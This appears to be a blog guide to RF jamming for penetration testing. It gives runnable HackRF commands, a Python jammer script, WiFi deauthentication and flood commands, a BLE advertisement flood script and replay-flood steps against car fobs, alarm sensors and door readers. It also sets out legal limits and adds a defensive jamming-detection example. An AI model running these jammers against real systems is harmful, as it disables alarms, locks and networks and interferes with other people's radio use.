Jamming Signals/Frequencies (Guide)
- Dylan Gallus

- 2 days ago
- 8 min read

Signal jamming for pentesting is about testing system resilience — what happens when wireless communication fails. This is a guide on jamming signals/frequencies.
The Hardware Toolchain
What You Already Have (Flipper Zero)
The Flipper's CC1101 Sub-GHz radio can transmit continuous wave at 300-348 MHz, 387-464 MHz, and 779-928 MHz (Unleashed firmware removes the TX lock). Its BLE module (nRF52832) can flood 2.4 GHz BLE channels. Neither is a dedicated jammer but both can disrupt specific targets at close range.
What Actually Works for Pentest Jamming
| Device | Range | Frequency Coverage | Power | Best For |
|---|---|---|---|---|
| HackRF One | Medium | 1 MHz - 6 GHz (full) | ~15 dBm | Full-spectrum testing, protocol-aware jamming |
| LimeSDR | Medium | 100 kHz - 3.8 GHz | ~10 dBm | Precise, FPGA-accelerated |
| BladeRF | Medium | 47 MHz - 6 GHz | ~8 dBm | Wideband, good filtering |
| CC1101 + 20dBm amp | Long | 300-928 MHz | ~100 mW | Sub-GHz only, cheap, effective |
| nRF24L01 + PA/LNA | Medium | 2.4 GHz | ~20 dBm | WiFi/BLE jamming |
| ESP32 | Short | 2.4 GHz (WiFi/BLE) | ~20 dBm | Deauth attacks, BLE flooding |
| YARD Stick One | Medium | Sub-GHz | ~15 dBm | Dedicated Sub-GHz, good modulation |
For most vehicle and access control pentests, HackRF is the right tool. Full frequency range, good power, massive community tooling.
Frequency Landscape - What You're Jamming
Different targets, different bands:
| Target System | Frequency | Modulation | Jam Type |
|---|---|---|---|
| Car key fobs (US) | 315 MHz | ASK/OOK | CW or pattern-specific |
| Car key fobs (EU) | 433.92 MHz | ASK/OOK | CW or pattern-specific |
| Car PKE challenge | 125 kHz | LF CW | Magnetic field (different hardware) |
| Alarm panel sensors | 315/433/868 MHz | ASK/OOK, FSK | CW or replay flooding |
| Garage doors | 315/390/433 MHz | ASK/OOK, rolling | Protocol-aware |
| WiFi 2.4 GHz | 2.4-2.4835 GHz | OFDM/DSSS | Deauth, channel flood |
| WiFi 5 GHz | 5.15-5.85 GHz | OFDM | Channel-specific flood |
| Bluetooth/BLE | 2.4-2.4835 GHz | FHSS/GFSK | Channel map flooding |
| GPS L1 | 1575.42 MHz | BPSK | CW sweep (extremely low power only) |
| NFC / HF RFID | 13.56 MHz | ASK, various | Magnetic field disruption |
| Cellular (test lab only) | 700-2600 MHz | Various | Wideband noise (FARADAY CAGE REQUIRED) |
| LoRa / LoRaWAN | 868/915 MHz | Chirp spread | Chirp-specific sweep |
Critical boundary: Jamming cellular, GPS, aviation, emergency services, or public communications is illegal regardless of pentest authorization. GPS jamming within a shielded lab for product testing is the sole exception. For a building pentest, cellular and GPS are off the table unless you own the spectrum or are in a certified Faraday environment.
Technique 1: Continuous Wave (CW)
The Sledgehammer
The simplest jam. Transmit a pure carrier at the target frequency. Any receiver near you is deafened by the signal.
HackRF — CW Jammer
```bash
# Simple continuous wave at 315 MHz
hackrf_transfer -f 315000000 -x 40 -a 1 -t /dev/zero
# Parameters:
# -f: frequency in Hz
# -x 40: TX gain (0-47, 40 is max safe, 47 may overheat)
# -a 1: enable amplifier
# -t /dev/zero: transmit zeros = CW tone

# Swept CW (harder to filter, hits wider targets)
hackrf_transfer -f 315000000 -x 40 -a 1 -s 2000000 -t sweep.iq
# Where sweep.iq is a pre-generated IQ file that sweeps ±100 kHz
```
Flipper Zero — CW via External CC1101
```bash
# Flipper GPIO → external CC1101 with PA/LNA
# Use Unleashed firmware's CC1101 ext app
# Or write custom Sub-GHz RAW that's just carrier
# On Flipper: Sub-GHz → Read → Raw → record 1 second of silence
# Edit the .sub file to extend duration
# This effectively transmits dead carrier at whatever frequency you set
```
Python Automation for HackRF
```python
#!/usr/bin/env python3
"""
Targeted jammer for authorized pentesting.
Jams specific frequency for defined duration.
"""
import subprocess
import time
import sys
import signal
import argparse


def jam(freq_mhz, duration_sec, gain=40):
    """Transmit CW at specified frequency for specified duration"""
    freq_hz = int(freq_mhz * 1_000_000)
    print(f"[+] Jamming {freq_mhz} MHz for {duration_sec} seconds...")
    proc = subprocess.Popen([
        "hackrf_transfer",
        "-f", str(freq_hz),
        "-x", str(gain),
        "-a", "1",          # Amp on
        "-t", "/dev/zero",  # CW
        "-s", "2000000",    # Sample rate
    ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    try:
        time.sleep(duration_sec)
    except KeyboardInterrupt:
        pass
    finally:
        # The transmitter is always stopped, whatever ended the sleep
        proc.terminate()
        proc.wait()
        print("[+] Jammer stopped")


def jam_pulse(freq_mhz, on_time, off_time, cycles, gain=40):
    """Pulsed jamming — harder to locate, tests recovery behavior"""
    freq_hz = int(freq_mhz * 1_000_000)
    print(f"[+] Pulsed jamming {freq_mhz} MHz: "
          f"{on_time}s on / {off_time}s off × {cycles}")
    for i in range(cycles):
        print(f"    Pulse {i+1}/{cycles} — JAMMING")
        proc = subprocess.Popen([
            "hackrf_transfer",
            "-f", str(freq_hz),
            "-x", str(gain),
            "-a", "1",
            "-t", "/dev/zero",
            "-s", "2000000",
        ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        try:
            time.sleep(on_time)
        finally:
            # Stop the transmitter even if Ctrl-C arrives mid-pulse
            proc.terminate()
            proc.wait()
        if i < cycles - 1:
            print(f"    Pulse {i+1}/{cycles} — quiet")
            time.sleep(off_time)
    print("[+] Pulse sequence complete")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Targeted pentest jammer")
    parser.add_argument("freq", type=float, help="Target frequency in MHz")
    parser.add_argument("-d", "--duration", type=int, default=10,
                        help="Duration in seconds")
    parser.add_argument("-p", "--pulse", action="store_true",
                        help="Pulsed mode")
    parser.add_argument("--on-time", type=float, default=2.0)
    parser.add_argument("--off-time", type=float, default=3.0)
    parser.add_argument("--cycles", type=int, default=5)
    parser.add_argument("-g", "--gain", type=int, default=40)
    args = parser.parse_args()
    # Ctrl-C becomes SystemExit, so the finally blocks above still run
    signal.signal(signal.SIGINT, lambda s, f: sys.exit(0))
    if args.pulse:
        jam_pulse(args.freq, args.on_time, args.off_time,
                  args.cycles, args.gain)
    else:
        jam(args.freq, args.duration, args.gain)
```
Technique 2: Protocol-Aware Jamming - The Scalpel
CW is loud and obvious. Protocol-aware jamming injects garbage into the actual protocol, disrupting communication while looking like noise to spectrum analyzers.
Sub-GHz — Car Fob / Alarm Sensor Jamming
```bash
# Capture the target's actual signal first (with Flipper or HackRF)
hackrf_transfer -f 315000000 -r target_signal.iq -s 2000000 -n 20000000
# Analyze in Universal Radio Hacker (URH) or inspectcli
# Determine: modulation (ASK/OOK/FSK), bit rate, preamble, sync word

# Generate jamming signal that mimics the protocol
# — Repeating preamble (prevents sync)
# — Random payload (corrupts valid data after sync)
# — Valid structure with invalid data (fools some filters)
# URH can generate these from the captured signal

# Export as IQ file, replay with HackRF:
hackrf_transfer -f 315000000 -t protocol_jam.iq -x 40 -a 1 -R
# -R: repeat the IQ file continuously
```
WiFi Deauthentication (Targeted)
This is protocol-level jamming. Not a raw RF blast — you're sending valid 802.11 management frames.
```bash
# Aireplay-ng — deauth specific client
sudo aireplay-ng -0 0 -a AP_MAC -c CLIENT_MAC wlan0mon
# -0 0: infinite deauth packets

# MDK4 — the dedicated WiFi jammer
sudo mdk4 wlan0mon d -c 1,6,11                  # Deauth on channels 1, 6, 11
sudo mdk4 wlan0mon b -c 1 -t AP_MAC             # Beacon flood on channel 1
sudo mdk4 wlan0mon a -a AP_MAC                  # Auth flood (DoS AP)
sudo mdk4 wlan0mon p -b 00:11:22:33:44:55       # Probe flood

# ESP32 deauther (dedicated, portable)
# Flash Spacehuhn's ESP8266/ESP32 Deauther firmware
# Battery-powered, fits in pocket
# Web interface to select targets
```
BLE — Advertisement Flooding
```python
#!/usr/bin/env python3
"""BLE advertisement flood — tests BLE resilience"""
from scapy.all import *


def ble_adv_flood(iface="hci0", count=1000):
    """Flood BLE advertising channels with random advertisements"""
    print(f"[+] BLE flood starting on {iface}")
    for i in range(count):
        # Random MAC, random data
        pkt = BTLE() / BTLE_ADV(RxAdd=0, TxAdd=0) / \
              BTLE_ADV_IND(AdvA=RandMAC(), AdvData=b"\x00" * 31)
        sendp(pkt, iface=iface, verbose=0)
        if i % 100 == 0:
            print(f"    Sent {i} advertisements")
    print(f"[+] Flood complete: {count} advertisements sent")

# For Flipper Zero: Apps → Bluetooth → BLE Spam
# Select target type (iOS, Android, Windows, Tesla)
# Floods BLE advertisements continuously
```
Technique 3: GPS Jamming (Shielded Lab Only)
GPS L1 (1575.42 MHz) is extremely weak at the receiver (~-130 dBm). Even microwatt-level jamming can overwhelm it.
This is ILLEGAL outside a certified Faraday cage. Within a shielded lab testing vehicle telematics or asset trackers:
```bash
# Extremely low power GPS test signal
# ONLY in Faraday-caged environment

# Generate a swept tone across GPS L1 bandwidth (2 MHz wide)
# Using GNU Radio or custom IQ generation
python3 generate_gps_noise.py   # Your IQ file generator

# Transmit at MINIMUM power
hackrf_transfer -f 1575420000 -t gps_noise.iq -x 0 -a 0 -s 2000000
# -x 0: MINIMUM gain
# -a 0: amplifier OFF
# Start with lowest power, increase only if needed
# Verify with spectrum analyzer that signal stays in cage

# The pentest question: "Does the GPS tracker detect loss of signal
# and alert? Or does it silently fail?"
```
Technique 4: NFC / HF RFID Field Disruption
NFC and 13.56 MHz RFID use magnetic near-field coupling. Jamming requires disrupting the reader's magnetic field.
```bash
# This is HARD to do at distance — near-field drops as 1/r³
# Practical only within ~10cm of the reader

# Flipper Zero approach:
# 13.56 MHz → Extra Actions → Emulate Reader
# Flipper continuously polls for cards
# This creates a competing 13.56 MHz field
# Hold Flipper against the target reader
# The reader's field and Flipper's field interfere
# Tags can't communicate with either

# Dedicated approach: Proxmark3 (in the pm3 client, run):
#   hf 14a reader
# Continuous polling disrupts nearby ISO 14443 readers

# This tests: does the door fail open or fail closed?
# Does security detect the reader being disrupted?
```
Technique 5: Sub-GHz Spoof-Jamming Hybrid
The most effective Sub-GHz attack isn't pure jamming — it's flooding with valid-looking but wrong data.
```bash
# 1. Capture the target's sensor/key fob signal
hackrf_transfer -f 433920000 -r capture.iq -s 2000000 -n 10000000

# 2. Extract the protocol in URH
# Identify: preamble, sync word, payload structure, CRC

# 3. Generate hundreds of variants:
#    - Valid preamble + random payload
#    - Valid preamble + valid structure + random values
#    - Valid structure + invalid CRC (consumes receiver processing time)

# 4. Replay at high speed
hackrf_transfer -f 433920000 -t spoof_flood.iq -x 40 -a 1 -R

# The receiver spends all its time trying to decode garbage.
# Legitimate signals are lost in the noise.
```
Pentest Methodology - What You're Actually Testing
Jamming isn't a standalone attack. You're testing resilience:
1. Fail-Safe vs Fail-Secure
[Alarm sensor jammed] → Does it alert "sensor offline" or stay silent?
[Door controller jammed] → Does it lock, unlock, or maintain state?
[GPS jammed] → Does tracker alert, or report last known position silently?
[WiFi deauthed] → Does the security system fall back to wired? Cellular?
2. Detection Testing
[Start jamming] → How long until SOC/SIEM detects signal loss?
[Stop jamming] → Does the system auto-recover? How long?
[Pulse jamming] → Does intermittent disruption trigger alerts or get averaged out?
3. Fallback Testing
[WiFi down] → Does the alarm panel fall back to cellular? Ethernet?
[Sub-GHz down] → Do sensors have alternate paths? Wired zones?
[BLE down] → Does the phone key fall back to NFC? Keypad?
[GPS down] → Does navigation fall back to dead reckoning? INS?
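The detection and fail-safe questions above only have good answers if the receiving side carries logic that can raise the alert. The following is an added example, not part of the original post: a small Python analyser that runs over a constructed receiver log and flags the three outcomes these checklists probe (raised noise floor with nothing decodable, a burst of CRC failures from a spoof-flood, and a sensor whose heartbeat is overdue). The log format, field names and thresholds are assumptions made for the example.

```python
# Constructed sample log (assumed format): one receiver sample per line,
# "t=<s> rssi=<dBm> event=<ok|crc_fail|noise> [id=<sensor>]".
SAMPLE_LOG = """\
t=1 rssi=-60 event=ok id=door1
t=30 rssi=-61 event=ok id=door1
t=60 rssi=-40 event=noise
t=62 rssi=-40 event=noise
t=63 rssi=-95 event=noise
t=90 rssi=-58 event=crc_fail
t=91 rssi=-57 event=crc_fail
t=92 rssi=-59 event=crc_fail
t=95 rssi=-60 event=ok id=door1
t=130 rssi=-94 event=noise
"""

def parse(line):
    f = dict(tok.split("=", 1) for tok in line.split())
    return int(f["t"]), int(f["rssi"]), f["event"], f.get("id")

def analyse(log, baseline_dbm=-90, jam_margin_db=20, supervision_s=45, crc_burst=3):
    """Return sorted (time, alert) pairs; the thresholds are assumed values."""
    alerts, last_seen, overdue = [], {}, set()
    jam_start, crc_start, crc_run = None, None, 0
    for line in log.splitlines():
        t, rssi, event, sid = parse(line)
        loud = event == "noise" and rssi > baseline_dbm + jam_margin_db
        # 1. Noise floor up, nothing decodable (CW jam); each burst is its own
        #    alert, so pulsed jamming is counted rather than averaged away.
        if loud and jam_start is None:
            jam_start = t
        elif not loud and jam_start is not None:
            alerts.append((jam_start, "noise_floor_jam"))
            jam_start = None
        # 2. Run of CRC failures: flood of valid-looking but wrong frames.
        if event == "crc_fail":
            crc_start = t if crc_run == 0 else crc_start
            crc_run += 1
            if crc_run == crc_burst:
                alerts.append((crc_start, "decode_flood"))
        else:
            crc_run = 0
        # 3. Supervision: a sensor heartbeat is overdue (the silent-failure case).
        if event == "ok" and sid:
            last_seen[sid] = t
            overdue.discard(sid)
        for name, seen in last_seen.items():
            if t - seen > supervision_s and name not in overdue:
                alerts.append((seen + supervision_s, f"supervision_timeout:{name}"))
                overdue.add(name)
    if jam_start is not None:  # log ended while still jammed
        alerts.append((jam_start, "noise_floor_jam"))
    return sorted(alerts)
```

Run against the sample it reports the jam at t=60, the missed door1 heartbeat at t=75 and the decode flood at t=90; the time between each alert and the jam start is exactly the "time to detection" figure the documentation step asks for.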
Engagement Workflow
```bash
# ===== PRE-ENGAGEMENT =====
# 1. Document: every frequency you'll transmit on
# 2. Document: max power level, duration, location
# 3. Confirm: Faraday cage for any GPS/cellular testing
# 4. Confirm: no adjacent medical/life-safety wireless systems
# 5. Have: spectrum analyzer ready to verify emissions stay in scope

# ===== TESTING =====
# 6. Start with minimum power, increase only as needed
# 7. Jam for minimum duration to observe effect
# 8. Allow full recovery between tests
# 9. Monitor with spectrum analyzer throughout

# ===== DOCUMENTATION =====
# 10. For each test: frequency, power, duration, observed effect
# 11. Time from jam start to detection (by blue team)
# 12. Time from jam stop to full recovery
# 13. CVSS for each finding
```
The Safety Boundaries
These are hard lines. Crossing them is illegal regardless of pentest authorization:
| Don't | Why |
|---|---|
| Jam cellular bands (700-2600 MHz in US) | Blocks 911 calls. Federal crime. FCC hunts aggressively. |
| Jam GPS outside a Faraday cage | Aircraft, maritime, emergency services. Severe federal crime. |
| Jam aviation bands (108-137 MHz) | Air traffic control. Life safety. |
| Jam marine VHF (156-162 MHz) | Distress channels. Coast Guard responds. |
| Jam emergency services | Police/fire/ambulance radio. Obvious. |
| Jam in hospitals | Medical telemetry, pacemaker programmers. |
| Jam outside your authorized scope | The authorization letter defines the building/floor/time window. Stay in it. |
| Use power amplification without measurement | Know your ERP. A HackRF + 20W amp at 315 MHz will blanket a neighborhood. Don't. |
| Leave the jammer unattended | You must be physically present and able to stop immediately if something goes wrong. |
Practical: HackRF Jamming Kit Build
```bash
# Minimum viable pentest jamming kit:
# 1. HackRF One
# 2. Portable power (USB-C battery pack, 20000 mAh)
# 3. Laptop running Kali
# 4. Small spectrum analyzer (TinySA, ~$60 — verifies your emissions)
# 5. Appropriate antennas:
#    - 315/433 MHz telescopic for Sub-GHz
#    - 2.4/5 GHz for WiFi/BLE
#    - GPS patch antenna (shielded lab only)

# Verify emissions before testing:
# 1. Set up HackRF at test frequency
# 2. Walk perimeter with TinySA in max-hold mode
# 3. Confirm signal is contained to authorized test area
# 4. Document the emission envelope
```